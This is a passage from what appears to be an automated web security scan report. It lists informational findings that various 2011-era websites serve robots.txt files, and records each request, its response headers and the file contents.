Disallow: /

User-agent: *
Disallow: /adlog/
Disallow: /Ads/
Disallow: /av/
Disallow: /
...[SNIP]...
24.119. http://www.bodybuilding.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bodybuilding.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bodybuilding.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 17 Mar 2010 15:38:16 GMT
ETag: "32ed15-75-48200e72b42d6"
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:38:18 GMT
Content-Length: 117
Connection: close

User-agent: *
Disallow: /teen/
Disallow: /bodybuilders/
Disallow: /lean/
Disallow: /store/bsn/nitrix_commercial.flv

24.120. http://www.boingboing.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boingboing.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.boingboing.net

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:06 GMT
Server: Apache/2.2
Last-Modified: Tue, 20 Apr 2004 16:21:23 GMT
Accept-Ranges: bytes
Content-Length: 33
Keep-Alive: timeout=60, max=988
Xonnection: Xeep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-bin
24.121. http://www.boldchat.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boldchat.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.boldchat.com

Response

HTTP/1.0 200 OK
Server: Resin/2.1.13
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://images.boldchat.com/w3c/p3p.xml"
ETag: "AAAAS8DZHlY"
Last-Modified: Tue, 29 Mar 2011 20:53:27 GMT
Content-Type: text/plain
Content-Length: 1027
Date: Sat, 02 Apr 2011 14:19:21 GMT

User-agent: *
Disallow: /chat/visitor.jsp
Disallow: /live_chat_software/support/auth/
Disallow: /live_chat_software/pa_sw_offer/
Disallow: /live_chat_software/bootcamp/
Disallow: /live_chat_software/m
...[SNIP]...
24.122. http://www.booking.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.booking.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:40 GMT
Server: Apache
Cache-Control: max-age=259200
Expires: Tue, 05 Apr 2011 13:33:40 GMT
Last-Modified: Wed, 16 Mar 2011 08:39:02 GMT
ETag: "205-4d807726"
Accept-Ranges: bytes
Content-Length: 517
Keep-Alive: timeout=5, max=95
Connection: close
Content-Type: text/plain

User-agent: psbot
Disallow: /
User-agent: TurnitinBot
Disallow: /
User-agent: NPBot-1/2.0
Disallow: /
User-agent: NPBot
Disallow: /
User-agent: *
Disallow: /honing.html
Disallow: /photo.html
Disallow:
...[SNIP]...
24.123. http://www.bookrags.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bookrags.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bookrags.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:17 GMT
Last-Modified: Fri, 30 Jul 2010 22:43:13 GMT
ETag: "200c5-2d0-48ca2937c84ec"
Accept-Ranges: bytes
Content-Length: 720
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain
Set-Cookie: TS2aad59=daba6359fe611af0250e010c4b90837a4ebfee64a37c73d94d97279a; Path=/
Set-Cookie: TS2aad59_28=bcfb1212b0341682932e9d51a063e88f4ebfee64a37c73d90000000000000000004d972799c4df4a8d26d97ac5; Path=/

Sitemap: http://www.bookrags.com/sitemap-index.xml

User-agent: Googlebot
Disallow: /s/
Disallow: /sk/
Disallow: /php/
Disallow: /essaygrade/
Disallow: /essayfree/
Disallow: /printfriendly/
Disallow:
...[SNIP]...
24.124. http://www.borders.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.borders.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.borders.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 16 Aug 2010 10:07:05 GMT
ETag: "1bb-fe984440"
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:32:22 GMT
Content-Length: 443
Connection: close

User-agent: *
Disallow: /online/store/OrderItemDisplay
Disallow: /online/store/OrderItemUpdate
Disallow: /online/store/OrderItemAdd
Disallow: /online/store/OrderItemDelete
Disallow: /online/store/Shop
...[SNIP]...
24.125. http://www.boston.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boston.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.boston.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:58 GMT
Server: Apache/2.2.10 (Unix) modpath/0.4 PHP/5.2.6
Last-Modified: Mon, 21 Jun 2010 19:32:33 GMT
Accept-Ranges: bytes
Content-Length: 96
Served-By: alechill
Keep-Alive: timeout=30
Connection: close
Content-Type: text/plain
Set-Cookie: bcpage=0;expires=Sun, 06-Mar-2016 13:42:56 GMT;path=/;domain=boston.com;

User-Agent: *
Sitemap: http://www.boston.com/Sitemap_index.xml
Disallow: /newsprojects/widgets/
24.126. http://www.brainyquote.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brainyquote.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.brainyquote.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:31 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/1.0.0d
Last-Modified: Fri, 01 Oct 2010 18:41:43 GMT
ETag: "16dc52e-54-491928bc467c0"
Accept-Ranges: bytes
Content-Length: 84
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain


User-agent: Mediapartners-Google*
Disallow:

User-agent: ia_archiver
Disallow: /
24.127. http://www.bravotv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bravotv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bravotv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Varnish: 1345775487
X-Varnish: 190097180 187967772
Content-Type: text/plain; charset=UTF-8
Varnish-X-Cache: HIT
ETag: "1f70035-77e-4977a49df0700"
Last-Modified: Wed, 15 Dec 2010 22:16:28 GMT
Varnish-X-Cache-Hits: 191
Content-Length: 1918
Cache-Control: max-age=17
Date: Sat, 02 Apr 2011 13:40:12 GMT
Connection: close

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
24.128. http://www.break.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.break.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.break.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 24 Jan 2011 23:57:00 GMT
ETag: "1eac576422bccb1:b41f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 24
Date: Sat, 02 Apr 2011 12:37:52 GMT
X-Varnish: 928889783 928791491
Age: 760
Via: 1.1 varnish
Connection: close
X-Varnish-Host: varnish01
X-Client-IP: 173.193.214.243
X-Country: US

User-agent: *

Allow: /
24.129. http://www.brighthub.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brighthub.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.brighthub.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sat, 02 Apr 2011 08:42:50 GMT
Accept-Ranges: bytes
ETag: "8479cff211f1cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 538
Date: Sat, 02 Apr 2011 13:35:45 GMT
Connection: close

# Robots.txt file for http://www.brighthub.com
#

User-agent: *
Disallow: /error.htm
Disallow: /servererror.aspx
Disallow: /email/email_nocontact.aspx
Disallow: /email/comment_unsubscribe.aspx
...[SNIP]...
24.130. http://www.britannica.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.britannica.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.britannica.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:31 GMT
Server: Apache/2.0.64 (Unix) mod_jk/1.2.31
Last-Modified: Tue, 23 Nov 2010 00:46:28 GMT
ETag: "264014-342-495adb3f68100"
Accept-Ranges: bytes
Content-Length: 834
Vary: Accept-Encoding,User-Agent
MyHeader: web103-b
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

# /robots.txt file for encyclopaedia britannica
# disallow spidering into ebsco


Sitemap: http://www.britannica.com/bps-gsm-index.xml

User-agent: *
Disallow: /search
Disallow: /search/magazine
Disal
...[SNIP]...
24.131. http://www.brothersoft.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brothersoft.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.brothersoft.com

Response

HTTP/1.0 200 OK
Server: BSWS/1.0
Content-Type: text/plain; charset=UTF-8
Content-Length: 404
Last-Modified: Fri, 07 Jan 2011 06:35:52 GMT
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 13:25:32 GMT
Connection: close

User-agent: *
Disallow: /admin/
Disallow: /newadmin/
Disallow: /newdbs/
Disallow: /newfunction/
Disallow: /adpage/
Disallow: /blog/wp-login.php
Disallow: /mobile/d_log.php
Disallow: /d.php
Di
...[SNIP]...
24.132. http://www.btradv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.btradv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.btradv.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:52:38 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
Last-Modified: Sat, 07 Jun 2008 01:21:00 GMT
ETag: "b004e-17-44f0964209700"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
24.133. http://www.business.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.business.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.business.com

Response

HTTP/1.0 200 OK
Cteonnt-Length: 207
Content-Type: text/plain
Last-Modified: Mon, 25 Oct 2010 20:55:48 GMT
ETag: "4fbb9408774cb1:cfa"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa HISa TELa OUR DELa SAMa UNRa PUBa OTRa BUS UNI COM NAV INT CNT PRE LOC"
Cache-Control: private, max-age=367320
Date: Sat, 02 Apr 2011 13:32:59 GMT
Content-Length: 207
Connection: close
Set-Cookie: Client-IP=173.193.214.243

User-agent: *
Disallow: /_css/
Disallow: /images/
Disallow: /images2/
Disallow: /internet/
Disallow: /search/
Disallow: /demo/
Disallow: /dexknows/

Sitemap: http://www.business.com/sitemap.
...[SNIP]...
24.134. http://www.businessweek.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.businessweek.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.businessweek.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.31
Last-Modified: Tue, 03 Nov 2009 16:42:26 GMT
benv: nybweb03
bvh: www.businessweek.com
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:25:41 GMT
Content-Length: 359
Connection: close

User-agent: *
Disallow: /event.ng
Disallow: /click.ng
Disallow: /reuters_stories
Disallow: /reprints
Disallow: /fixedcontent.htm
Disallow: /custserv
Disallow: /print
Disallow: /premium
Disallow: /tech
...[SNIP]...
24.135. http://www.buy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.buy.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 22 Oct 2010 20:39:18 GMT
Accept-Ranges: bytes
ETag: "7e3ef3322972cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 467
Date: Sat, 02 Apr 2011 13:37:44 GMT
Connection: close

# robots.txt for http://www.buy.com

User-agent: *
Disallow: /basket/
Disallow: /retail/
Disallow: /corp/
Disallow: /clickfrom/
Disallow: /linksys-covad/
Disallow: /faqs/
Disallow: /support/
...[SNIP]...
24.136. http://www.buysafe.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buysafe.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.buysafe.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 366
Content-Type: text/plain
Last-Modified: Wed, 10 Dec 2008 18:05:54 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONo HIS OUR SAMi LEG UNI NAV"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:53:59 GMT
Connection: close

User-Agent: *
Disallow: /tiastesting/
Disallow: /buysaferedesign/
Disallow: /websitebonding/
Disallow: /toolbar/
Allow: /
Disallow: /templates/

User-Agent: Googlebot-Image
Disallow: /email_i
...[SNIP]...
24.137. http://www.buzzfeed.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buzzfeed.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.buzzfeed.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:15 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 12 Jan 2011 20:44:18 GMT
ETag: "119011a-1f1-499ac43d06c80"
Accept-Ranges: bytes
Content-Length: 497
Vary: Accept-Encoding,User-Agent
X-BuzzFeed: feed5
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: msnbot
Crawl-delay: 120
Disallow: /*.xml$
Disallow: /buzz/*.xml$
Disallow: /category/*.xml$
Disallow: /mobile/
Disallow: *?s=mobile
Disallow: *?s=lightbox
Disallow: /buzzfeed
Disallow: /c
...[SNIP]...
24.138. http://www.buzzillions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.buzzillions.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:03:30 GMT
Server: Apache/2.2.9 (Unix)
Last-Modified: Fri, 12 Nov 2010 01:16:42 GMT
ETag: "72a"
Accept-Ranges: bytes
Content-Length: 1834
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: MediaPartners-Google
Disallow:
Disallow: /public/feeds
Disallow: /pages/popups
Disallow: /pages/promotions

User-Agent: Adsbot-Google
Disallow:
Disallow: /public/feeds
Disallow: /
...[SNIP]...
24.139. http://www.buzznet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buzznet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.buzznet.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:26 GMT
Server: Apache
Set-Cookie: bncom=173.193.214.243.8450130175186681; path=/; domain=.buzznet.com
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /error.php
Disallow: /error/
Disallow: /user/error.php
Disallow: /user/error/
Disallow: /chtml/
Disallow: /user/rss/
Disallow: /user/atom/
Disallow: /user/rss091.xml
Disallow:
...[SNIP]...
24.140. http://www.ca.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ca.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ca.gov

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 02 Jun 2010 07:10:15 GMT
Accept-Ranges: bytes
ETag: "581786a6222cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:25:03 GMT
Connection: close
Content-Length: 114

User-agent: *
Disallow: /images/
Disallow: /css/
Disallow: /javascript/
Disallow: /ssi/
Disallow: /templates/
24.141. http://www.cabelas.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cabelas.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cabelas.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 16 Dec 2010 20:42:54 GMT
Content-Type: text/plain; charset=UTF-8
Expires: Sat, 02 Apr 2011 13:32:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:32:03 GMT
Content-Length: 318
Connection: close

# Modified 20101215
User-agent: *
Disallow: /cabelas/
Disallow: /products/
Disallow: /search
Disallow: /content
Disallow: /browse
Disallow: /custserv/
Disallow: /user/
Disallow: /checkout
...[SNIP]...
24.142. http://www.cafemom.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafemom.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cafemom.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:28 GMT
Server: Apache
Cache-Control: max-age=900
Vary: Accept-Encoding
Content-Length: 376
Connection: close
Content-Type: text/plain; charset=utf-8


User-agent: *
Sitemap: http://www.cafemom.com/sitemap.xml
Disallow: /admin/
Disallow: /*PHPSESSID
Disallow: /*utm_medium
Disallow: /photos/
Disallow: /search/
Disallow: /profile/
Disallow: /chatterbo
...[SNIP]...
24.143. http://www.canada.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.canada.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.canada.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Compression-Control: no-compress
Content-Type: text/plain
Content-Length: 1240
Cache-Control: private, max-age=3600
Expires: Sat, 02 Apr 2011 14:41:16 GMT
Date: Sat, 02 Apr 2011 13:41:16 GMT
Connection: close

User-agent: Googlebot-Mobile
Allow: /mobile/

User-agent: YahooSeeker/M1A1-R2D2
Allow: /mobile/

Disallow: /_doc/*
Disallow: /_staging/*
Disallow: /_tech/*
Disallow: /_data/*

#
# BEGIN FP
...[SNIP]...
24.144. http://www.candystand.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.candystand.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.candystand.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 19 Jan 2010 03:24:14 GMT
ETag: "104317-95-47d7c010eb380"
Accept-Ranges: bytes
Content-Length: 149
Content-Type: text/plain; charset=ISO-8859-1
Date: Sat, 02 Apr 2011 13:23:02 GMT
Connection: close
X-N: S

User-Agent: *
Allow: /my-candystand
Allow: /my-player-profile
Allow: /my/index
Allow: /my-page
Disallow: /my/
Disallow: /ajax/
Disallow: /r.do
24.145. http://www.canon.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.canon.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.canon.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:59:10 GMT
Server: Apache
Last-Modified: Mon, 20 Dec 2010 07:30:23 GMT
ETag: "59183e3-49-497d27e3261c0"
Accept-Ranges: bytes
Content-Length: 73
Connection: close
Content-Type: text/plain

# robots.txt for http://www.canon.com/

User-Agent: *
Disallow: /js/
24.146. http://www.caranddriver.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.caranddriver.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.caranddriver.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.17 (Unix) DAV/2 PHP/5.2.6
Last-Modified: Thu, 29 Jul 2010 21:15:54 GMT
ETag: "69417b-63-48c8d3d537680"
Accept-Ranges: bytes
Content-Length: 99
Content-Type: text/plain
Cache-Control: max-age=60
Date: Sat, 02 Apr 2011 14:03:34 GMT
Connection: close

User-agent: *
Disallow: /content/
Sitemap: http://www.caranddriver.com/cdsitemap/sitemap_index.xml
24.147. http://www.care2.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.care2.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.care2.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:24 GMT
Server: Apache/2.2.8
Last-Modified: Wed, 02 Jun 2010 22:42:44 GMT
ETag: "bea353-3b4-48813cee96100"
Accept-Ranges: bytes
Content-Length: 948
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# http://info.webcrawler.com/mak/projects/robots/exclusion-admin.html
#
User-agent: *
Disallow: /r.html
Disallow: /mail.html
Disallow: /community/tos_popup.html
Disallow: /ecards/p/
Disallow: /send/pi
...[SNIP]...
24.148. http://www.careerbuilder.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.careerbuilder.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Last-Modified: Wed, 16 Mar 2011 13:10:16 GMT
Accept-Ranges: bytes
ETag: "c834ed7ddbe3cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-PBY: REBEL1
Date: Sat, 02 Apr 2011 12:42:26 GMT
Connection: close
Content-Length: 5654

User-agent: Mediapartners-Google*
Disallow:

User-agent: Google*
Disallow: /Custom/
Disallow: /custom/
Disallow: /Partner/
Disallow: /partner/
Disallow: /PSA/
Disallow: /psa/
Disallow: /RTQ
...[SNIP]...
24.149. http://www.careerrookie.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.careerrookie.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.careerrookie.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Last-Modified: Wed, 16 Mar 2011 13:10:16 GMT
Accept-Ranges: bytes
ETag: "c834ed7ddbe3cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-PBY: BEAR41
Date: Sat, 02 Apr 2011 14:02:26 GMT
Connection: close
Content-Length: 5654

User-agent: Mediapartners-Google*
Disallow:

User-agent: Google*
Disallow: /Custom/
Disallow: /custom/
Disallow: /Partner/
Disallow: /partner/
Disallow: /PSA/
Disallow: /psa/
Disallow: /RTQ
...[SNIP]...
24.150. http://www.caringbridge.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.caringbridge.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.caringbridge.org

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:06 GMT
Server: Apache
Last-Modified: Sun, 13 Feb 2011 16:57:43 GMT
ETag: "c3988b-4a8-49c2cd4692fc0"
Accept-Ranges: bytes
Content-Length: 1192
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:44:06 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: googlebot-image
Disallow: /
User-agent: yahoo-mmcrawler
Disallow: /
User-agent: psbot
Disallow: /
User-agent: asterias
Disallow: /
User-agent: *
Disallow: /cgi-bin/
Disallow: /mn/
Disallow
...[SNIP]...
24.151. http://www.carmax.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.carmax.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.carmax.com

Response

HTTP/1.1 200 OK
Set-Cookie: KMXCOM=UPIJWISKMXCOMWEB031T0x0000000e_0xc70bb1c1COIIM; expires=Sat, 2-Apr-2011 14:42:09 GMT; path=/
Content-Length: 13364
Content-Type: text/plain
Last-Modified: Mon, 19 Jul 2010 15:48:13 GMT
Accept-Ranges: bytes
ETag: "3087a2cb5927cb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:42:11 GMT
Connection: close

User-Agent: *
#vehicle search
Disallow: /enUS/zip-entry/
Disallow: /enUS/store-entry/
Disallow: /enUS/search-results/
Disallow: /enUS/advanced-search/
Disallow: /enUS/compare-cars/
#car page
D
...[SNIP]...
24.152. http://www.carnival.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.carnival.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.carnival.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Tue, 25 Jan 2011 20:35:13 GMT
ETag: "214ffd5dcfbccb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:56:17 GMT
Content-Length: 638
Connection: close

User-Agent: *
Disallow: /Errors/
Disallow: /BookEngine.aspx
Disallow: /Redir.aspx
Disallow: /SiteSearchRedirect.aspx
Disallow: /Search/Default.aspx
Disallow: /find_a_Cruise/search_Results.aspx

...[SNIP]...
24.153. http://www.cars.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cars.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cars.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:45 GMT
Server: IBM_HTTP_Server
Last-Modified: Mon, 19 Jul 2010 20:42:34 GMT
ETag: "9ce4-573-9bb42280"
Accept-Ranges: bytes
Content-Length: 1395
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Connection: close
Content-Type: text/plain
Set-Cookie: cars_persist=3980465324.20480.0000; expires=Sat, 02-Apr-2011 14:08:01 GMT; path=/
Vary: Accept-Encoding, User-Agent

# /robots.txt file for http://www.cars.com

Sitemap: http://www.cars.com/sitemap_index.xml

User-agent: *
Disallow: /cgi-bin
Disallow: /news
Disallow: /privatebeta
Disallow: /searchpreview
Di
...[SNIP]...
24.154. http://www.cartoonnetwork.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cartoonnetwork.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cartoonnetwork.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:47 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 02 Apr 2011 13:54:12 GMT
Content-Length: 418
Content-Type: text/plain
Connection: close

User-agent: *
Disallow: /help/
Disallow: /tools/
Disallow: /templatedata/
Disallow: /error_page/
Disallow: /gen/
Disallow: /test/
Disallow: /contests/
Disallow: /data/
Disallow: /inc/
Disallow: /redir
...[SNIP]...
24.155. http://www.casttv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.casttv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.casttv.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 02 Apr 2011 13:45:51 GMT
